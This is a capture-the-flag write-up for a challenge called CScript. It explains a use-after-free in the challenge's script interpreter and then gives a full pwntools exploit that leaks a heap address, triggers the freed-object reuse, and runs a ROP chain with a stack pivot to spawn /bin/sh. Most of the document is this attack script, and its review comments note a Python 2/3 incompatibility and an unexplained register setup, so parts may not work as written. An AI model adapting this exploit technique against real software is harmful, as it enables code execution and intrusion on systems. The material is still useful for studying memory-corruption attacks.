3rd place

CScript (4 solves)

There is a UAF vulnerability when we assign a value to a variable using the + statement. We can achieve arbitrary code execution in the Print function by exploiting the UAF vulnerability. Finally, we just need to build our ROP chain and find a gadget that triggers a stack pivot to execute execve("/bin/sh", 0, 0).

# Exploit script accompanying the CScript writeup above.
# Flow: read the leaked heap base, place a ROP chain inside a Store()'d string,
# trigger the use-after-free the writeup attributes to `c=a+b` / `Release(c)`,
# overwrite the freed object, then `Print(b)` runs the chain.
# NOTE(review): the str concatenations below (e.g. 'a' * 0x20 + rop_chain and
# p64(...) + 'a') only work where pwntools' p64()/flat() return str, i.e. on
# Python 2; under Python 3 they return bytes and `+` raises TypeError — confirm
# which interpreter this was run with before reusing.
from pwn import *

io = remote('cscript.wolvctf.io', 1337)  # challenge endpoint named in the writeup
context.bits = 64  # p64()/flat() pack 64-bit little-endian words

# Thin aliases over the pwntools tube API.
ru = lambda x : io.recvuntil(x, drop = True)   # read up to delimiter x, dropping it
sla = lambda a, b : io.sendlineafter(a, b)      # wait for prompt a, send b plus newline
ia = lambda : io.interactive()                  # hand the connection to the user

# The service prints its heap base; parse the hex value that follows the label.
ru('Heap base: ')
heap_base = int(ru('\n'), 16)
# Variable `a` holds 0x20 bytes of filler.
sla('>> ', 'a=Store(' + '\"' + 'a' * 0x20 + '\"' + ')')
# Gadget addresses are absolute constants in the 0x40xxxx range, which presumes
# a non-PIE binary; they are specific to the challenge binary and not derivable here.
gadget = 0x00000000004ab607   # stack-pivot gadget per the writeup
pop_rax = 0x000000000040af06
pop_rsi = 0x0000000000401786
pop_rdx_rbx = 0x00000000004ac707
syscall = 0x0000000000445a22
# ROP chain: rax = 0x3b (execve), rsi = 0, rdx = 0 (rbx is a don't-care), syscall.
# rdi is not set by the chain; '/bin/sh' is laid out after it on the next line,
# but how rdi ends up pointing at it is not visible in this script — TODO confirm.
rop_chain = flat([
pop_rax,
0x3b,
pop_rsi,
0,
pop_rdx_rbx,
0,
0,
syscall
])
# Second input line: filler, the chain, filler, '/bin/sh', filler. It is consumed
# by the next `>> ` prompt; what the interpreter does with it is not shown here.
sla('>> ', 'a' * 0x20 + rop_chain + 'a' * 0x10 + '/bin/sh' + 'a' * 0x10)
sla('>> ', 'b=Store(6)')
# `c=a+b` is the operation the writeup identifies as the UAF trigger.
sla('>> ', 'c=a+b')
sla('>> ', 'Release(c)')
# Overwrite the freed object: two heap pointers (base + 0x13840 - 0x30 and
# base + 0x13890 — binary-specific offsets whose origin is not shown here), then the
# gadget address, padded so the line still parses as a `=Store("...")` statement.
# NOTE(review): the literal 0x00000000004ab607 duplicates `gadget` defined above.
sla('>> ', p64(heap_base + 0x13840 - 0x30) + 'a' + p64(heap_base + 0x13890) + p64(0x00000000004ab607) + 'a' * 7 + '=Store(' + '\"' + 'a' * 0x20 +'\"' + ')')
# Print(b) reaches the corrupted object and, per the writeup, executes the chain.
sla('>> ', 'Print(b)')
ia()